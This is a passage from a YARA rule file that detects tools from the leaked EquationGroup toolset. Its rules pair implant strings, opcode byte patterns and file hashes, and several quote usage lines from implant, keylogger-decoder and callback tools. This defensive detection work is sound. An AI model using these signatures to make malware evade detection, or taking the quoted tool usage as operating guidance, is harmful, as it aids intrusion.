plugin=%u" fullword wide $s2 = "Unable to get TCP listen port: %08x" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_lp_mstcp { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "2ab1e1d23021d887759750a0c053522e9149b7445f840936bbc7e703f8700abd" strings: $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide $s2 = "_PacketNDISRequestComplete@12\"" fullword ascii $s3 = "_LDNdis5RegDeleteKeys@4" fullword ascii $op1 = { 89 7e 04 75 06 66 21 46 02 eb } $op2 = { fc 74 1b 8b 49 04 0f b7 d3 66 83 } $op3 = { aa 0f b7 45 fc 8b 52 04 8d 4e } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and ( all of ($s*) or all of ($op*) ) ) } rule EquationGroup_Toolset_Apr17_renamer { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "9c30331cb00ae8f417569e9eb2c645ebbb36511d2d1531bb8d06b83781dfe3ac" strings: $s1 = "FILE_NAME_CONVERSION.LOG" fullword wide $s2 = "Log file exists. You must delete it!!!" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_PC_Exploit { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0" strings: $s1 = "\\\\.\\pipe\\pcheap_reuse" fullword wide $s2 = "**** FAILED TO DUPLICATE SOCKET ****" fullword wide $s3 = "**** UNABLE TO DUPLICATE SOCKET TYPE %u ****" fullword wide $s4 = "YOU CAN IGNORE ANY 'ServiceEntry returned error' messages after this..." fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 20KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_PC_Level3_Gen { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c7dd49b98f399072c2619758455e8b11c6ee4694bb46b2b423fa89f39b185a97" hash2 = "f6b723ef985dfc23202870f56452581a08ecbce85daf8dc7db4491adaa4f6e8f" strings: $s1 = "S-%u-%u" fullword ascii $s2 = "Copyright (C) Microsoft" fullword wide $op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 } $op2 = { 44 24 4e 41 88 5c 24 4f ff } $op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 } condition: ( uint16(0) == 0x5a4d and filesize < 400KB and 3 of them ) } rule EquationGroup_Toolset_Apr17_put_Implant9x { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "8fcc98d63504bbacdeba0c1e8df82f7c4182febdf9b08c578d1195b72d7e3d5f" strings: $s1 = "3&3.3<3A3F3K3V3c3m3" fullword ascii $op1 = { c9 c2 08 00 b8 72 1c 00 68 e8 c9 fb ff ff 51 56 } $op2 = { 40 1b c9 23 c8 03 c8 38 5d 14 74 05 6a 03 58 eb } condition: ( uint16(0) == 0x5a4d and filesize < 20KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_promiscdetect_safe { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "6070d8199061870387bb7796fb8ccccc4d6bafed6718cbc3a02a60c6dc1af847" strings: $s1 = "running on this computer!" fullword ascii $s2 = "- Promiscuous (capture all packets on the network)" fullword ascii $s3 = "Active filter for the adapter:" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_PacketScan_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "9b97cac66d73a9d268a15e47f84b3968b1f7d3d6b68302775d27b99a56fbb75a" strings: $op0 = { e9 ef fe ff ff ff b5 c0 ef ff ff 8d 85 c8 ef ff } $op1 = { c9 c2 04 00 b8 34 26 00 68 e8 40 05 00 00 51 56 } $op2 = { e9 0b ff ff ff 8b 45 10 8d 4d c0 89 58 08 c6 45 } condition: ( uint16(0) == 0x5a4d and filesize < 30KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetPorts { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "722d3cf03908629bc947c4cca7ce3d6b80590a04616f9df8f05c02de2d482fb2" strings: $s1 = "USAGE: SetPorts <input file> <output file> <version> <port1> [port2] [port3] [port4] [port5]" fullword ascii $s2 = "Valid versions are: 1 = PC 1.2 2 = PC 1.2 (24 hour)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_GrDo_FileScanner_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "8d2e43567e1360714c4271b75c21a940f6b26a789aa0fce30c6478ae4ac587e4" strings: $s1 = "system32\\winsrv.dll" fullword wide $s2 = "raw_open CreateFile error" fullword ascii $s3 = "\\dllcache\\" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 400KB and all of them ) } rule EquationGroup_Toolset_Apr17_msgks_mskgu { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "7b4986aee8f5c4dca255431902907b36408f528f6c0f7d7fa21f079fa0a42e09" hash2 = "ef906b8a8ad9dca7407e0a467b32d7f7cf32814210964be2bfb5b0e6d2ca1998" strings: $op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 } $op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 } $op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f } condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_Ifconfig_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "1ebfc0ce7139db43ddacf4a9af2cb83a407d3d1221931d359ee40588cfd0d02b" strings: $s1 = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\%hs" fullword wide $op1 = { 0f be 37 85 f6 0f 85 4e ff ff ff 45 85 ed 74 21 } $op2 = { 4c 8d 44 24 34 48 8d 57 08 41 8d 49 07 e8 a6 4b } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_DiBa_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6" strings: $op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 } $op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 } $op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 } condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17_Dsz_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "fbe103fac45abe4e3638055a3cac5e7009166f626cf2d3049fb46f3b53c1057f" hash2 = "ad1dddd11b664b7c3ad6108178a8dade0a6d9795358c4a7cedbe789c62016670" strings: $s1 = "%02u:%02u:%02u.%03u-%4u: " fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and all of them ) } rule EquationGroup_Toolset_Apr17_GenKey { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "b6f100b21da4f7e3927b03b8b5f0c595703b769d5698c835972ca0c81699ff71" strings: $x1 = "* PrivateEncrypt -> PublicDecrypt FAILED" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_wmi_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "de08d6c382faaae2b4b41b448b26d82d04a8f25375c712c12013cb0fac3bc704" strings: $x1 = "SELECT ProcessId,Description,ExecutablePath FROM Win32_Process" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 50KB and all of them ) } rule EquationGroup_Toolset_Apr17_clocksvc { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c1bcd04b41c6b574a5c9367b777efc8b95fe6cc4e526978b7e8e09214337fac1" strings: $x1 = "~debl00l.tmp" fullword ascii $x2 = "\\\\.\\mailslot\\c54321" fullword ascii $x3 = "\\\\.\\mailslot\\c12345" fullword ascii $x4 = "nowMutex" fullword ascii $s1 = "System\\CurrentControlSet\\Services\\MSExchangeIS\\ParametersPrivate" fullword ascii $s2 = "000000005017C31B7C7BCF97EC86019F5026BE85FD1FB192F6F4237B78DB12E7DFFB07748BFF6432B3870681D54BEF44077487044681FB94D17ED04217145B98" ascii $s3 = "00000000E2C9ADBD8F470C7320D28000353813757F58860E90207F8874D2EB49851D3D3115A210DA6475CCFC111DCC05E4910E50071975F61972DCE345E89D88" ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($x*) or 2 of ($s*) ) ) } rule EquationGroup_Toolset_Apr17_xxxRIDEAREA { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "214b0de83b04afdd6ad05567825b69663121eda9e804daff9f2da5554ade77c6" strings: $x1 = "USAGE: %s -i InputFile -o OutputFile [-f FunctionOrdinal] [-a FunctionArgument] [-t ThreadOption]" fullword ascii $x2 = "The output payload \"%s\" has a size of %d-bytes." fullword ascii $x3 = "ERROR: fwrite(%s) failed on ucPayload" fullword ascii $x4 = "Load and execute implant within the existing thread" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_yak_min_install { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f67214083d60f90ffd16b89a0ce921c98185b2032874174691b720514b1fe99e" strings: $s1 = "driver start" fullword ascii $s2 = "DeviceIoControl Error: %d" fullword ascii $s3 = "Phlook" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetOurAddr { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "04ccc060d401ddba674371e66e0288ebdbfa7df74b925c5c202109f23fb78504" strings: $s1 = "USAGE: SetOurAddr <input file> <output file> <protocol> [IP/IPX address]" fullword ascii $s2 = "Replaced default IP address (127.0.0.1) with Local IP Address %d.%d.%d.%d" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_GetAdmin_LSADUMP_ModifyPrivilege_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c8b354793ad5a16744cf1d4efdc5fe48d5a0cf0657974eb7145e0088fcf609ff" hash2 = "5f06ec411f127f23add9f897dc165eaa68cbe8bb99da8f00a4a360f108bb8741" strings: $s1 = "\\system32\\win32k.sys" fullword wide $s2 = "hKeAddSystemServiceTable" fullword ascii $s3 = "hPsDereferencePrimaryToken" fullword ascii $s4 = "CcnFormSyncExFBC" fullword wide $s5 = "hPsDereferencePrimaryToken" fullword ascii $op1 = { 0c 2b ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b } $op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 } $op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 } condition: ( uint16(0) == 0x5a4d and filesize < 80KB and ( 4 of ($s*) or all of ($op*) ) ) } rule EquationGroup_Toolset_Apr17_SendPKTrigger { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26" strings: $x1 = "----====**** PORT KNOCK TRIGGER BEGIN ****====----" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_DmGz_Target_2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "55ac29b9a67e0324044dafaba27a7f01ca3d8e4d8e020259025195abe42aa904" strings: $s1 = "\\\\.\\%ls" fullword ascii $op0 = { e8 ce 34 00 00 b8 02 00 00 f0 e9 26 02 00 00 48 } $op1 = { 8b 4d 28 e8 02 05 00 00 89 45 34 eb 07 c7 45 34 } $op2 = { e8 c2 34 00 00 90 48 8d 8c 24 00 01 00 00 e8 a4 } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_mstcp32_DXGHLP16_tdip { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6" hash2 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665" hash3 = "a5ec4d102d802ada7c5083af53fd9d3c9b5aa83be9de58dbb4fac7876faf6d29" strings: $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide $s2 = "\\DosDevices\\%ws" fullword wide $s3 = "\\Device\\%ws_%ws" fullword wide $s4 = "sys\\mstcp32.dbg" fullword ascii $s5 = "%ws%03d%ws%wZ" fullword wide $s6 = "TCP/IP driver" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 4 of them ) } rule EquationGroup_Toolset_Apr17_regprobe { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "99a42440d4cf1186aad1fd09072bd1265e7c6ebbc8bcafc28340b4fe371767de" strings: $x1 = "Usage: %s targetIP protocolSequence portNo [redirectorIP] [CLSID]" fullword ascii $x2 = "key does not exist or pinging w2k system" fullword ascii $x3 = "RpcProxy=255.255.255.255:65536" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_DoubleFeatureDll_dll_2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f265defd87094c95c7d3ddf009d115207cd9d4007cf98629e814eda8798906af" hash2 = "8d62ca9e6d89f2b835d07deb5e684a576607e4fe3740f77c0570d7b16ebc2985" hash3 = "634a80e37e4b32706ad1ea4a2ff414473618a8c42a369880db7cc127c0eb705e" strings: $s1 = ".dllfD" fullword ascii $s2 = "Khsppxu" fullword ascii $s3 = "D$8.exe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_GangsterThief_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "50b269bda5fedcf5a62ee0514c4b14d48d53dd18ac3075dcc80b52d0c2783e06" strings: $s1 = "\\\\.\\%s:" fullword wide $s4 = "raw_open CreateFile error" fullword ascii $s5 = "-PATHDELETED-" fullword ascii $s6 = "(deleted)" fullword wide $s8 = "NULLFILENAME" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 3 of them ) } rule EquationGroup_Toolset_Apr17_SetCallbackPorts { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "16f66c2593665c2507a78f96c0c2a9583eab0bda13a639e28f550c92f9134ff0" strings: $s1 = "USAGE: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]" fullword ascii $s2 = "You may enter between 1 and 6 ports to change the defaults." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_DiBa_Target_BH_2000 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "0654b4b8727488769390cd091029f08245d690dd90d1120e8feec336d1f9e788" strings: $s2 = "0M1U1Z1p1" fullword ascii /* base64 encoded string '3U5gZu' */ $s14 = "SPRQWV" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17_rc5 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "69e2c68c6ea7be338497863c0c5ab5c77d5f522f0a84ab20fe9c75c7f81318eb" strings: $s1 = "Usage: %s [d|e] session_key ciphertext" fullword ascii $s2 = "where session_key and ciphertext are strings of hex" fullword ascii $s3 = "d = decrypt mode, e = encrypt mode" fullword ascii $s4 = "Bad mode, should be 'd' or 'e'" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_PC_Level_Generic { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "7a6488dd13936e505ec738dcc84b9fec57a5e46aab8aff59b8cfad8f599ea86a" hash2 = "0e3cfd48732d0b301925ea3ec6186b62724ec755ed40ed79e7cd6d3df511b8a0" hash3 = "d1d6e3903b6b92cc52031c963e2031b5956cadc29cc8b3f2c8f38be20f98a4a7" hash4 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c" hash5 = "591abd3d7ee214df25ac25682b673f02219da108d1384261052b5167a36a7645" hash6 = "6b71db2d2721ac210977a4c6c8cf7f75a8f5b80b9dbcece1bede1aec179ed213" hash7 = "7be4c05cecb920f1010fc13086635591ad0d5b3a3a1f2f4b4a9be466a1bd2b76" hash8 = "f9cbccdbdf9ffd2ebf1ee84d0ddddd24a61dbe0858ab7f0131bef6c7b9a19131" hash9 = "3cf7a01bdf8e73769c80b75ca269b506c33464d81f574ded8bb20caec2d4cd13" hash10 = "a87a871fe32c49862ed68fda99d92efd762a33ababcd9b6b2b909f2e01f59c16" strings: $s1 = "wshtcpip.WSHGetSocketInformation" fullword ascii $s2 = "\\\\.\\%hs" fullword ascii $s3 = ".?AVResultIp@Mini_Mcl_Cmd_NetConnections@@" fullword ascii $s4 = "Corporation. All rights reserved." fullword wide $s5 = { 49 83 3c 24 00 75 02 eb 5d 49 8b 34 24 0f b7 46 } $op1 = { 44 24 57 6f c6 44 24 58 6e c6 44 24 59 } $op2 = { c6 44 24 56 64 88 5c 24 57 } $op3 = { 44 24 6d 4c c6 44 24 6e 6f c6 44 24 6f } condition: uint16(0) == 0x5a4d and filesize < 400KB and ( 2 of ($s*) or all of ($op*) ) } rule EquationGroup_Toolset_Apr17_PC_Level3_http_exe { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "3e855fbea28e012cd19b31f9d76a73a2df0eb03ba1cb5d22aafe9865150b020c" strings: $s1 = "Copyright (C) Microsoft" fullword wide $op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 } $op2 = { 44 24 4e 41 88 5c 24 4f ff } $op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 } condition: ( uint16(0) == 0x5a4d and filesize < 400KB and all of them ) } rule EquationGroup_Toolset_Apr17_ParseCapture { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c732d790088a4db148d3291a92de5a449e409704b12e00c7508d75ccd90a03f2" strings: $x1 = "* Encrypted log found. An encryption key must be provided" fullword ascii $x2 = "encryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"" fullword ascii $x3 = "Decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 50KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_ActiveDirectory_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "33c1b7fdee7c70604be1e7baa9eea231164e62d5d5090ce7f807f43229fe5c36" strings: $s1 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide $s2 = "(&(objectClass=user)(objectCategory=person)" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_PC_Legacy_dll { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "0cbc5cc2e24f25cb645fb57d6088bcfb893f9eb9f27f8851503a1b33378ff22d" strings: $op1 = { 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 } $op2 = { 49 c6 45 e1 73 c6 45 e2 57 c6 45 e3 } $op3 = { 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 6f c6 45 ea } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_svctouch { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "96b6a3c4f53f9e7047aa99fd949154745e05dc2fd2eb21ef6f0f9b95234d516b" strings: $s1 = "Causes: Firewall,Machine down,DCOM disabled\\not supported,etc." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 10KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_pwd_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "ee72ac76d82dfec51c8fbcfb5fc99a0a45849a4565177e01d8d23a358e52c542" strings: $s1 = "7\"7(7/7>7O7]7o7w7" fullword ascii $op1 = { 40 50 89 44 24 18 FF 15 34 20 00 } condition: ( uint16(0) == 0x5a4d and filesize < 20KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_KisuComms_Target_2000 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "94eea1bad534a1dc20620919de8046c9966be3dd353a50f25b719c3662f22135" strings: $s1 = "363<3S3c3l3q3v3{3" fullword ascii $s2 = "3!3%3)3-3135393@5" fullword ascii /* Recommendation - verify the opcodes on Binarly : http://www.binar.ly */ /* Test each of them in the search field & reduce length until it generates matches */ $op0 = { eb 03 89 46 54 47 83 ff 1a 0f 8c 40 ff ff ff 8b } $op1 = { 8b 46 04 85 c0 74 0f 50 e8 34 fb ff ff 83 66 04 } $op2 = { c6 45 fc 02 8d 8d 44 ff ff ff e8 d2 2f 00 00 eb } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and ( all of ($s*) or all of ($op*) ) ) } rule EquationGroup_Toolset_Apr17_SlDecoder { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "b220f51ca56d9f9d7d899fa240d3328535f48184d136013fd808d8835919f9ce" strings: $x1 = "Error in conversion. SlDecoder.exe <input filename> <output filename> at command line " fullword wide $x2 = "KeyLogger_Data" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Windows_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "d38ce396926e45781daecd18670316defe3caf975a3062470a87c1d181a61374" strings: $s2 = "0#0)0/050;0M0Y0h0|0" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 50KB and all of them ) } rule EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0" hash2 = "320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557" hash3 = "c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3" hash4 = "551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e" hash5 = "8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46" strings: $s1 = "PQRAPAQSTUVWARASATAUAVAW" fullword ascii $s2 = "SQRUWVAWAVAUATASARAQAP" fullword ascii $s3 = "iijymqp" fullword ascii $s4 = "AWAVAUATASARAQI" fullword ascii $s5 = "WARASATAUAVM" fullword ascii $op1 = { 0c 80 30 02 48 83 c2 01 49 83 e9 01 75 e1 c3 cc } $op2 = { e8 10 66 0d 00 80 66 31 02 48 83 c2 02 49 83 e9 } $op3 = { 48 b8 53 a5 e1 41 d4 f1 07 00 48 33 } condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of ($s*) or all of ($op*) ) } rule EquationGroup_Toolset_Apr17_DoubleFeatureDll_dll_3 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "515374423b8b132258bd91acf6f29168dcc267a3f45ecb9d1fe18ee3a253195b" strings: $a = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 } $b = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 } $c = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f } condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetCallback { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "a8854f6b01d0e49beeb2d09e9781a6837a0d18129380c6e1b1629bc7c13fdea2" strings: $s2 = "*NOTE: This version of SetCallback does not work with PeddleCheap versions prior" fullword ascii $s3 = "USAGE: SetCallback <input file> <output file>" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "052e778c26120c683ee2d9f93677d9217e9d6c61ffc0ab19202314ab865e3927" hash2 = "5db457e7c7dba80383b1df0c86e94dc6859d45e1d188c576f2ba5edee139d9ae" strings: $x1 = "DFReader.exe logfile AESKey [-j] [-o outputfilename]" fullword ascii $x2 = "Double Feature Target Version" fullword ascii $x3 = "DoubleFeature Process ID" fullword ascii $op1 = { a1 30 21 41 00 89 85 d8 fc ff ff a1 34 21 41 00 } condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 2 of them ) } rule 